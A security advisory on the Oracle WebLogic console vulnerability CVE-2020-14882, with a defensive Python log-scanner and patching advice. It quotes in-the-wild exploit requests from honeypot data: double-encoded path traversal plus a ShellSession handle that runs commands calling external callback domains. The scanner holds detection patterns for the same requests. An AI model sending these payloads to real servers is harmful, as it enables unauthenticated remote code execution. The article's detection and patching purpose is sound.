A critical Remote Code Execution (RCE) vulnerability, CVE-2020-14882, in the console component of Oracle WebLogic Server allows unauthenticated, remote attackers to execute commands on affected servers. Oracle has assigned it a CVSSv3 score of 9.8 out of 10, which clearly shows the vulnerability's criticality; it should be patched as soon as possible. Johannes B. Ullrich, dean of research at the SANS Technology Institute, said in his post that for any Oracle WebLogic Server that has not been patched by now, you should “Assume it has been compromised”.
The exploits appear to originate from a blog post published (in Vietnamese) by “Jang”, in which he described how the flaw can be exploited to achieve remote code execution with only a single HTTP request.
The RCE vulnerability exists in the console component of the WebLogic Server. It can be exploited by sending a crafted HTTP request and can lead to complete control of the host. Security researcher Jang included partial details of the flaw in his blog post, which can be used to build a PoC.
As discussed in the SANS ISC post, the exploits below are currently in use (the honeypot's IP has been replaced with AAA.BBB.CCC.DDD):
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c
GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \”java.lang.Runtime.getRuntime().exec( ‘nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net’)
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);
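As an added example (not code from the SANS post, from Jang's write-up, or from this article), the following Python snippet shows how a defender might screen web-server access logs for the request pattern seen above: a double-URL-encoded path traversal from the unauthenticated /console/images/ path back to console.portal, combined with a handle parameter that carries a constructor call. Detection like this complements patching; it does not replace it. The log lines are constructed samples, the client IPs are placeholders, and the hostname example.invalid stands in for the callback domains in the honeypot data.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (hypothetical, not taken from the page).
# The first two mimic the pattern reported by the SANS ISC honeypot (upper- and
# lower-case hex variants); the last two are benign console traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Oct/2020:10:12:01 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27ping%20AAA.BBB.CCC.DDD.example.invalid%27);%22); HTTP/1.1" 200 1234
10.0.0.6 - - [29/Oct/2020:10:12:05 +0000] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27nslookup%20AAA.BBB.CCC.DDD.example.invalid%27);%22); HTTP/1.1" 200 1234
10.0.0.7 - - [29/Oct/2020:10:13:00 +0000] "GET /console/images/logo.png HTTP/1.1" 200 5678
10.0.0.8 - - [29/Oct/2020:10:14:00 +0000] "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 302 0
"""

# Extracts the request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A handle value that looks like "some.Class(" is a constructor call, which a
# legitimate console handle never is.
CONSTRUCTOR_RE = re.compile(r'^[A-Za-z_][\w.]*\s*\(')


def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e -> %2e -> .) is unwrapped."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_query(raw_query):
    """Split a raw query string on '&' only and fully decode each value.

    Done by hand rather than with parse_qs so that ';' inside the handle value
    is never treated as a separator, regardless of Python version.
    """
    params = {}
    for pair in raw_query.split('&'):
        key, _, value = pair.partition('=')
        params[decode_fully(key)] = decode_fully(value)
    return params


def analyze_request(target):
    """Return the list of indicator names found in one request target ([] if clean)."""
    indicators = []
    parts = urlsplit(target)
    # Decode but do NOT normalise the path: normpath would collapse the '..'
    # and hide exactly the thing we want to see.
    path = decode_fully(parts.path)
    if path.startswith('/console/images/') and '..' in path and path.endswith('console.portal'):
        indicators.append('traversal_to_console_portal')

    handle = parse_query(parts.query).get('handle', '').strip()
    if CONSTRUCTOR_RE.match(handle):
        indicators.append('handle_constructor_call')
    if 'ShellSession' in handle or 'Runtime.getRuntime().exec' in handle:
        indicators.append('handle_shell_or_exec')
    return indicators


def scan_log(text):
    """Return [(client_ip, indicators)] for every log line that trips an indicator."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        indicators = analyze_request(match.group('target'))
        if indicators:
            hits.append((line.split()[0], indicators))
    return hits


if __name__ == '__main__':
    for ip, found in scan_log(SAMPLE_LOG):
        print(ip, ', '.join(found))
```

Both the upper-case (%252E) and lower-case (%252e) encodings seen in the honeypot data decode to the same traversal, so the check is done on the decoded path rather than on a literal string match. The constructor-call indicator fires on any class name followed by an opening parenthesis, so it is not tied to the specific class used in these requests.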
This pre-authentication vulnerability is given an attack complexity of “low” and is highlighted as “easily exploitable” by Oracle. Because of the low complexity of the exploit, attackers require no user interaction and no privileges to exploit the vulnerability.
A typical crafted HTTP request which exploits the vulnerability and executes “calc.exe” is given below:
In the above request, “calc.exe” can be replaced by any other OS command.
On successful exploitation of the vulnerability, “calc.exe” is executed on the affected host, as shown in the picture below.
Publicly available PoC
Proof-of-concept code for this vulnerability is publicly available.
This vulnerability allows an unauthenticated, remote attacker to execute commands and can be used to achieve complete control of the affected host.
Affected Oracle WebLogic Versions
SanerNow security content has been published to detect this vulnerability. Oracle has already released a security update this month; these patches are available only to Oracle customers. Please download the patch from the Oracle portal and install it. The SanerNow software deployment capability can be used to install executables and scripts.